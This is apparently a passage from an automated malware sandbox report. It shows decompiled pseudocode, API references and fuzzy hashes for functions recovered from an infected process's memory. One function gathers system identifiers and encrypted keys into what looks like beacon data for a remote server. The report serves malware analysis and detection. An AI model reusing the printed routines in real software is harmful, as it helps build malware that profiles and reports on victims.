								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E001CB22C(_t55, _t66);
										_t89 = _t66 + 0x10;
										E001CB287(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E001CB323(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x001cb120
0x001cb121
0x001cb122
0x001cb125
0x001cb127
0x001cb12a
0x001cb12b
0x001cb12d
0x001cb12e
0x001cb12f
0x001cb132
0x001cb13c
0x001cb1ed
0x001cb1f4
0x001cb1fd
0x001cb142
0x001cb142
0x001cb148
0x001cb14e
0x001cb151
0x001cb154
0x001cb158
0x001cb15d
0x001cb162
0x001cb1e2
0x00000000
0x001cb164
0x001cb164
0x001cb170
0x001cb172
0x001cb1cd
0x001cb1cd
0x001cb1d3
0x00000000
0x001cb174
0x001cb183
0x001cb185
0x001cb186
0x001cb187
0x001cb18a
0x001cb18a
0x001cb18c
0x00000000
0x001cb18e
0x001cb18e
0x001cb1d8
0x001cb190
0x001cb190
0x001cb194
0x001cb19c
0x001cb1a1
0x001cb1a6
0x001cb1b2
0x001cb1ba
0x001cb1c1
0x001cb1c7
0x001cb1cb
0x00000000
0x001cb1cb
0x001cb18e
0x001cb18c
0x00000000
0x001cb172
0x001cb1e6
0x001cb1e6
0x001cb1e6
0x001cb162
0x001cb202
0x001cb209

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction ID: c39bbe2a35d68da2820dad6154ebe3fa609d1947eddb5874be5abc3fe06382cf
Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction Fuzzy Hash: A221B2329042149BCB14EF68D8D2EABBBA5FF54350F49816CE955CB245D730FA15CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 002A3FA8, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2504141033.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000006.00000002.2504161357.00000000002B8000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2504170151.00000000002FD000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6db2e7ad59aed6164d3a801dd9d988d2f0d5b046bba1ded36895bc7511698fec
Instruction ID: b8695ea88530ba0e20b127c5006bc84c100396f05469e265359210379cf3aac7
Opcode Fuzzy Hash: 6db2e7ad59aed6164d3a801dd9d988d2f0d5b046bba1ded36895bc7511698fec
Instruction Fuzzy Hash: D1318432910619DFEB08CE24C9567DA7B70FF40B20F28865EBC35D94D5CBB987209BA4

Uniqueness

Uniqueness Score: -1.00%

Function 001CA279, Relevance: 34.7, APIs: 23, Instructions: 201
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E001CA279(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0x1cd018; // 0x294bbca
				asm("bswap eax");
				_t27 =  *0x1cd014; // 0xd5ce6b3c
				asm("bswap eax");
				_t28 =  *0x1cd010; // 0xeb65f451
				asm("bswap eax");
				_t29 =  *0x1cd00c; // 0x35163570
				asm("bswap eax");
				_t30 =  *0x1cd27c; // 0x317a7d0
				_t3 = _t30 + 0x1ce633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3d14b, _t29, _t28, _t27, _t26,  *0x1cd02c,  *0x1cd004, _t25);
				_t33 = E001C1C1A();
				_t34 =  *0x1cd27c; // 0x317a7d0
				_t4 = _t34 + 0x1ce673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37;
				_t96 = E001C54BC(_t91);
				if(_t96 != 0) {
					_t83 =  *0x1cd27c; // 0x317a7d0
					_t6 = _t83 + 0x1ce8eb; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0x1cd238, 0, _t96);
				}
				_t97 = E001C7649();
				if(_t97 != 0) {
					_t78 =  *0x1cd27c; // 0x317a7d0
					_t8 = _t78 + 0x1ce8f3; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0x1cd238, 0, _t97);
				}
				_t98 =  *0x1cd32c; // 0x33497d8
				_a32 = E001C9395(0x1cd00a, _t98 + 4);
				_t42 =  *0x1cd2cc; // 0x0
				if(_t42 != 0) {
					_t74 =  *0x1cd27c; // 0x317a7d0
					_t11 = _t74 + 0x1ce8cd; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0x1cd2c8; // 0x0
				if(_t43 != 0) {
					_t71 =  *0x1cd27c; // 0x317a7d0
					_t13 = _t71 + 0x1ce8c6; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t100 = RtlAllocateHeap( *0x1cd238, 0, 0x800);
					if(_t100 != 0) {
						E001C7A80(GetTickCount());
						_t50 =  *0x1cd32c; // 0x33497d8
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0x1cd32c; // 0x33497d8
						__imp__(_t54 + 0x40);
						_t56 =  *0x1cd32c; // 0x33497d8
						_t103 = E001C8307(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0x1cc2ac);
							_push(_t103);
							_t62 = E001C3CC8();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E001C1199(0xffffffffffffffff, _t100, _v28, _v24);
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E001CA1B0();
								}
								HeapFree( *0x1cd238, 0, _v44);
							}
							HeapFree( *0x1cd238, 0, _t103);
						}
						HeapFree( *0x1cd238, 0, _t100);
					}
					HeapFree( *0x1cd238, 0, _a24);
				}
				HeapFree( *0x1cd238, 0, _t105);
				return _a12;
			}

0x001ca279
0x001ca279
0x001ca279
0x001ca280
0x001ca286
0x001ca28e
0x001ca290
0x001ca290
0x001ca29d
0x001ca2a8
0x001ca2ab
0x001ca2b6
0x001ca2b9
0x001ca2be
0x001ca2c1
0x001ca2c6
0x001ca2c9
0x001ca2d5
0x001ca2e2
0x001ca2e4
0x001ca2ea
0x001ca2ef
0x001ca2fa
0x001ca2fc
0x001ca2ff
0x001ca306
0x001ca30a
0x001ca30c
0x001ca311
0x001ca31d
0x001ca31f
0x001ca32b
0x001ca32d
0x001ca32d
0x001ca338
0x001ca33c
0x001ca33e
0x001ca343
0x001ca34f
0x001ca351
0x001ca35d
0x001ca35f
0x001ca35f
0x001ca365
0x001ca378
0x001ca37c
0x001ca383
0x001ca386
0x001ca38b
0x001ca396
0x001ca398
0x001ca39b
0x001ca39b
0x001ca39d
0x001ca3a4
0x001ca3a7
0x001ca3ac
0x001ca3b6
0x001ca3b8
0x001ca3c0
0x001ca3d9
0x001ca3dd
0x001ca3e9
0x001ca3ee
0x001ca3f7
0x001ca408
0x001ca40c
0x001ca415
0x001ca41b
0x001ca428
0x001ca435
0x001ca43b
0x001ca447
0x001ca44d
0x001ca44e
0x001ca455
0x001ca459
0x001ca45f
0x001ca466
0x001ca46d
0x001ca473
0x001ca47a
0x001ca47e
0x001ca489
0x001ca490
0x001ca494
0x001ca49d
0x001ca49d
0x001ca4ae
0x001ca4ae
0x001ca4bd
0x001ca4bd
0x001ca4cc
0x001ca4cc
0x001ca4de
0x001ca4de
0x001ca4ed
0x001ca4fe

APIs

GetTickCount.KERNEL32 ref: 001CA290
wsprintfA.USER32 ref: 001CA2DD
wsprintfA.USER32 ref: 001CA2FA
wsprintfA.USER32 ref: 001CA31D
HeapFree.KERNEL32(00000000,00000000), ref: 001CA32D
wsprintfA.USER32 ref: 001CA34F
HeapFree.KERNEL32(00000000,00000000), ref: 001CA35F
wsprintfA.USER32 ref: 001CA396
wsprintfA.USER32 ref: 001CA3B6
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001CA3D3
GetTickCount.KERNEL32 ref: 001CA3E3
RtlEnterCriticalSection.NTDLL(03349798), ref: 001CA3F7
RtlLeaveCriticalSection.NTDLL(03349798), ref: 001CA415

Part of subcall function 001C8307: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,754294D8,?,?,001CA428,?,033497D8), ref: 001C8332
Part of subcall function 001C8307: lstrlen.KERNEL32(?,?,?,001CA428,?,033497D8), ref: 001C833A
Part of subcall function 001C8307: strcpy.NTDLL ref: 001C8351
Part of subcall function 001C8307: lstrcat.KERNEL32(00000000,?), ref: 001C835C
Part of subcall function 001C8307: StrTrimA.SHLWAPI(00000000,=), ref: 001C8379

StrTrimA.SHLWAPI(00000000,001CC2AC), ref: 001CA447

Part of subcall function 001C3CC8: lstrlen.KERNEL32(03349B38,00000000,00000000,754294D8,001CA453,00000000), ref: 001C3CD8
Part of subcall function 001C3CC8: lstrlen.KERNEL32(?), ref: 001C3CE0
Part of subcall function 001C3CC8: lstrcpy.KERNEL32(00000000,03349B38), ref: 001C3CF4
Part of subcall function 001C3CC8: lstrcat.KERNEL32(00000000,?), ref: 001C3CFF

lstrcpy.KERNEL32(00000000,?), ref: 001CA466
lstrcpy.KERNEL32(00000000,00000000), ref: 001CA46D
lstrcat.KERNEL32(00000000,?), ref: 001CA47A
lstrcat.KERNEL32(00000000,00000000), ref: 001CA47E

Part of subcall function 001C1199: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C124B

HeapFree.KERNEL32(00000000,?,00000000), ref: 001CA4AE
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CA4BD
HeapFree.KERNEL32(00000000,00000000,?), ref: 001CA4CC
HeapFree.KERNEL32(00000000,00000000), ref: 001CA4DE
HeapFree.KERNEL32(00000000,?), ref: 001CA4ED

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
String ID:
API String ID: 3080378247-0
Opcode ID: ba1b11c0b1acaafb94a6156fc1cd90c9a10bc74f35d1abcbb857e28666958294
Instruction ID: 1243dc09bd5947c111d95c4fd5b41e7728f75c25a03b283079cff70c2e8bb187
Opcode Fuzzy Hash: ba1b11c0b1acaafb94a6156fc1cd90c9a10bc74f35d1abcbb857e28666958294
Instruction Fuzzy Hash: 8761BA71500204EFC7229B68EC88F5A7FE8EF48704F0A4028F908D7661DB35EC95DBA6

Uniqueness

Uniqueness Score: -1.00%

Function 001CADE5, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 209
libraryCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E001CADE5(long _a4, long _a8) {
				signed int _v8;
				long _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				signed int _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				long _t82;
				long _t83;
				long _t85;
				intOrPtr* _t89;
				long _t94;
				void* _t98;
				intOrPtr* _t100;
				void* _t111;
				long _t112;
				void _t121;
				void* _t127;
				signed short _t129;
				struct HINSTANCE__* _t134;
				signed int* _t135;

				_t135 = _a4;
				_v28 = _t135[2] + 0x1c0000;
				_t111 = _t135[3] + 0x1c0000;
				_t127 = _t135[4] + 0x1c0000;
				_v8 = _t135[7];
				_v60 = _t135[1] + 0x1c0000;
				_v16 = _t135[5] + 0x1c0000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t135;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t135 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t134 =  *_v28;
				_t76 = _a8 - _t111 >> 2 << 2;
				_t129 =  *(_t127 + _t76);
				_a4 = _t76;
				_t80 =  !(_t129 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t129 + 0x1c0002;
				if(_t80 == 0) {
					_t81 = _t129 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x1cd1a0; // 0x0
				_t112 = 0;
				if(_t82 == 0) {
					L6:
					if(_t134 != 0) {
						L18:
						_t83 =  *0x1cd1a0; // 0x0
						_v48 = _t134;
						if(_t83 != 0) {
							_t83 =  *_t83(2,  &_v72);
							_t112 = _t83;
						}
						if(_t112 != 0) {
							L32:
							 *_a8 = _t112;
							L33:
							_t85 =  *0x1cd1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t134;
								_v44 = _t112;
								 *_t85(5,  &_v72);
							}
							return _t112;
						} else {
							if(_t135[5] == _t112 || _t135[7] == _t112) {
								L27:
								__imp__(_t134, _v52);
								_t112 = _t83;
								if(_t112 == 0) {
									_v40 = GetLastError();
									_t89 =  *0x1cd19c; // 0x0
									if(_t89 != 0) {
										_t112 =  *_t89(4,  &_v72);
									}
									if(_t112 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t112, 1,  &_a4);
										_t112 = _v44;
									}
								}
								goto L32;
							} else {
								_t83 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
								if( *_t83 == 0x4550 &&  *((intOrPtr*)(_t83 + 8)) == _v8 && _t134 ==  *((intOrPtr*)(_t83 + 0x34))) {
									_t83 = _v16;
									_t112 =  *(_a4 + _t83);
									if(_t112 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t94 =  *0x1cd1a0; // 0x0
					if(_t94 == 0) {
						L9:
						_t134 = LoadLibraryA(_v60);
						if(_t134 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t134) == _t134) {
								FreeLibrary(_t134);
							} else {
								if(_t135[6] != 0) {
									_t98 = LocalAlloc(0x40, 8);
									if(_t98 != 0) {
										 *(_t98 + 4) = _t135;
										_t121 =  *0x1cd198; // 0x0
										 *_t98 = _t121;
										 *0x1cd198 = _t98;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t100 =  *0x1cd19c; // 0x0
						if(_t100 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t134 =  *_t100(3,  &_v72);
						if(_t134 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t134 =  *_t94(1,  &_v72);
					if(_t134 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t112 =  *_t82(0,  &_v72);
				if(_t112 != 0) {
					goto L33;
				}
				goto L6;
			}

0x001cadf4
0x001cae0a
0x001cae10
0x001cae12
0x001cae17
0x001cae1d
0x001cae22
0x001cae25
0x001cae33
0x001cae3a
0x001cae3d
0x001cae40
0x001cae41
0x001cae44
0x001cae47
0x001cae4a
0x001cae4f
0x001cae5e
0x00000000
0x001cae64
0x001cae6e
0x001cae78
0x001cae7d
0x001cae7f
0x001cae89
0x001cae8c
0x001cae8f
0x001cae95
0x001cae97
0x001cae97
0x001cae9a
0x001cae9d
0x001caea2
0x001caea6
0x001caeb9
0x001caebb
0x001caf63
0x001caf63
0x001caf6a
0x001caf6d
0x001caf75
0x001caf77
0x001caf77
0x001caf7b
0x001caff9
0x001caffc
0x001caffe
0x001caffe
0x001cb005
0x001cb007
0x001cb011
0x001cb014
0x001cb017
0x001cb017
0x00000000
0x001caf7d
0x001caf80
0x001cafae
0x001cafb2
0x001cafb8
0x001cafbc
0x001cafc4
0x001cafc7
0x001cafce
0x001cafd8
0x001cafd8
0x001cafdc
0x001cafe1
0x001caff0
0x001caff6
0x001caff6
0x001cafdc
0x00000000
0x001caf87
0x001caf8a
0x001caf92
0x001cafa1
0x001cafa7
0x001cafac
0x00000000
0x00000000
0x001cafac
0x00000000
0x001caf92
0x001caf80
0x001caf7b
0x001caec1
0x001caec8
0x001caed8
0x001caee1
0x001caee5
0x001caf28
0x001caf34
0x001caf5d
0x001caf36
0x001caf3a
0x001caf40
0x001caf48
0x001caf4a
0x001caf4d
0x001caf53
0x001caf55
0x001caf55
0x001caf48
0x001caf3a
0x00000000
0x001caf34
0x001caeed
0x001caef0
0x001caef7
0x001caf07
0x001caf0a
0x001caf1a
0x00000000
0x001caf20
0x001caf01
0x001caf05
0x00000000
0x00000000
0x00000000
0x001caf05
0x001caed2
0x001caed6
0x00000000
0x00000000
0x00000000
0x001caed6
0x001caeaf
0x001caeb3
0x00000000
0x00000000
0x00000000

APIs

RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001CAE5E
LoadLibraryA.KERNEL32(?), ref: 001CAEDB
GetLastError.KERNEL32 ref: 001CAEE7
RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 001CAF1A

Strings

$, xrefs: 001CAE33

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad
String ID: $
API String ID: 948315288-3993045852
Opcode ID: 193f40e19e7b555d4a11c50724b836816d0a27a697e6b3d39dc9a93d96ad8cae
Instruction ID: 6348997f057a665665b1063e29ec29dc0db36190658d4a2caf78a8f47ff82fc1
Opcode Fuzzy Hash: 193f40e19e7b555d4a11c50724b836816d0a27a697e6b3d39dc9a93d96ad8cae
Instruction Fuzzy Hash: 518139B5A00209AFDB11CFA8D885FAEBBF5AF58304F54812DE909E7250E770ED41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 001C816C, Relevance: 13.6, APIs: 9, Instructions: 112
stringCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E001C816C(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x1cd33c; // 0x3349e00
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E001C70F5(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x1cc1ac;
				}
				_t46 = E001C8022(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E001C2049(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x1cd27c; // 0x317a7d0
						_t16 = _t75 + 0x1ceb28; // 0x530025
						 *0x1cd11c(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E001C70F5(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x1cc1b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E001C2049(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E001C9039(_v20);
						} else {
							_t66 =  *0x1cd27c; // 0x317a7d0
							_t31 = _t66 + 0x1cec48; // 0x73006d
							 *0x1cd11c(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E001C9039(_v12);
				}
				return _v24;
			}

0x001c8174
0x001c817a
0x001c8181
0x001c8187
0x001c818b
0x001c818f
0x001c8192
0x001c8199
0x001c819c
0x001c819e
0x001c819e
0x001c81a7
0x001c81ae
0x001c81b1
0x001c81b7
0x001c81c1
0x001c81ca
0x001c81d1
0x001c81ea
0x001c81f1
0x001c81f4
0x001c81fd
0x001c8206
0x001c8217
0x001c8220
0x001c8224
0x001c8228
0x001c822f
0x001c8232
0x001c8234
0x001c8234
0x001c823e
0x001c8247
0x001c824e
0x001c8266
0x001c826a
0x001c82a7
0x001c826c
0x001c826f
0x001c8277
0x001c8288
0x001c8294
0x001c829c
0x001c82a0
0x001c82a0
0x001c826a
0x001c82af
0x001c82b4
0x001c82bb

APIs

GetTickCount.KERNEL32(?,001C8B1E), ref: 001C8181
lstrlen.KERNEL32(?,80000002,00000005), ref: 001C81C1
lstrlen.KERNEL32(00000000), ref: 001C81CA
lstrlen.KERNEL32(00000000), ref: 001C81D1
lstrlenW.KERNEL32(80000002), ref: 001C81DE
lstrlen.KERNEL32(?,00000004), ref: 001C823E
lstrlen.KERNEL32(?), ref: 001C8247
lstrlen.KERNEL32(?), ref: 001C824E
lstrlenW.KERNEL32(?), ref: 001C8255

Part of subcall function 001C9039: HeapFree.KERNEL32(00000000,00000000,001C7F18), ref: 001C9045

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID:
API String ID: 2535036572-0
Opcode ID: 23eaee932a05eb8f0fd570c62cc979f980a9cb3f38e9308b21ed58fb99c3b334
Instruction ID: d9c7779ae6eab0eacee77e0b913c5774ad3ba6a96d5a20f93f80c5da18664e4a
Opcode Fuzzy Hash: 23eaee932a05eb8f0fd570c62cc979f980a9cb3f38e9308b21ed58fb99c3b334
Instruction Fuzzy Hash: 2C414772800218EFCF11AFA4DC49E9EBBB5EF58304F164069FD04A7221DB35DA61EB90

Uniqueness

Uniqueness Score: -1.00%

Function 001C8307, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E001C8307(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x1cd27c; // 0x317a7d0
				_t1 = _t9 + 0x1ce62c; // 0x253d7325
				_t36 = 0;
				_t28 = E001C9401(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E001C2049(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E001C7225(_t34, _t41, _a8);
						E001C9039(_t41);
						_t42 = E001C8E82(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E001C9039(_t36);
							_t36 = _t42;
						}
						_t43 = E001C788B(_t36, _t33);
						if(_t43 != 0) {
							E001C9039(_t36);
							_t36 = _t43;
						}
					}
					E001C9039(_t28);
				}
				return _t36;
			}

0x001c8307
0x001c830a
0x001c830b
0x001c8313
0x001c831a
0x001c8321
0x001c8325
0x001c832b
0x001c8332
0x001c8337
0x001c8349
0x001c834d
0x001c8351
0x001c8357
0x001c835c
0x001c836c
0x001c836e
0x001c8385
0x001c8389
0x001c838c
0x001c8391
0x001c8391
0x001c839a
0x001c839e
0x001c83a1
0x001c83a6
0x001c83a6
0x001c839e
0x001c83a9
0x001c83a9
0x001c83b4

APIs

Part of subcall function 001C9401: lstrlen.KERNEL32(00000000,00000000,00000000,754294D8,?,?,?,001C8321,253D7325,00000000,00000000,754294D8,?,?,001CA428,?), ref: 001C9468
Part of subcall function 001C9401: sprintf.NTDLL ref: 001C9489

lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,754294D8,?,?,001CA428,?,033497D8), ref: 001C8332
lstrlen.KERNEL32(?,?,?,001CA428,?,033497D8), ref: 001C833A

Part of subcall function 001C2049: RtlAllocateHeap.NTDLL(00000000,00000000,001C7E50), ref: 001C2055

strcpy.NTDLL ref: 001C8351
lstrcat.KERNEL32(00000000,?), ref: 001C835C

Part of subcall function 001C7225: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,001C836B,00000000,?,?,?,001CA428,?,033497D8), ref: 001C723C

Part of subcall function 001C9039: HeapFree.KERNEL32(00000000,00000000,001C7F18), ref: 001C9045

StrTrimA.SHLWAPI(00000000,=), ref: 001C8379

Part of subcall function 001C8E82: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,001C8385,00000000,?,?,001CA428,?,033497D8), ref: 001C8E8C
Part of subcall function 001C8E82: _snprintf.NTDLL ref: 001C8EEA

Strings

=, xrefs: 001C8373

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: e5bbc0f42cd96457522a8cacd5f5d24220b211022f100d73e723226227b84743
Instruction ID: 707abacee644ebb8129180696e525195ff2ea5770fecf57e844dd1c6eabb5f70
Opcode Fuzzy Hash: e5bbc0f42cd96457522a8cacd5f5d24220b211022f100d73e723226227b84743
Instruction Fuzzy Hash: 1111C633901624A787127BF5AC8AEBF3A9DAFB5B60709001EF90497101DF35DD0297E0

Uniqueness

Uniqueness Score: -1.00%

Function 001C6CC3, Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 001C771B: CoCreateInstance.OLE32(9BA05972,00000000,00000004,03348C20,00000000), ref: 001C774E

